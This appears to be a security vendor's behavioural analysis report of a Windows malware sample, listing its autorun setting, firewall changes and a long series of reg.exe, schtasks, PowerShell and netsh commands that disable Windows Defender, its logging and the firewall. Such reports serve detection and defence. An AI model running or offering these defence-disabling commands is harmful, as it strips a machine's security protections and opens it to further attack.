Technical Information
To ensure autorun and distribution
Sets the following service settings
- [<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
Malicious functions
To bypass firewall, removes or modifies the following registry keys
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Windows Defender
Modifies file system
Creates the following files
- %TEMP%\34c6.tmp\34d6.tmp\34d7.bat
Deletes the following files
- %TEMP%\34c6.tmp\34d6.tmp\34d7.bat
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\34C6.tmp\34D6.tmp\34D7.bat <Full path to file>"' (with hidden window)
Executes the following
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\34C6.tmp\34D6.tmp\34D7.bat <Full path to file>"
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableBehaviorMonitoring $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableIOAVProtection $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisablePrivacyMode $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableArchiveScanning $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableScriptScanning $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -SubmitSamplesConsent 2"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -DisableRealtimeMonitoring $true"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -MAPSReporting 0"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -ModerateThreatDefaultAction 6"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -LowThreatDefaultAction 6"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -SevereThreatDefaultAction 6"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "netsh advfirewall set allprofiles state off"
- '<SYSTEM32>\netsh.exe' advfirewall set allprofiles state off
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
- '<SYSTEM32>\reg.exe' add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
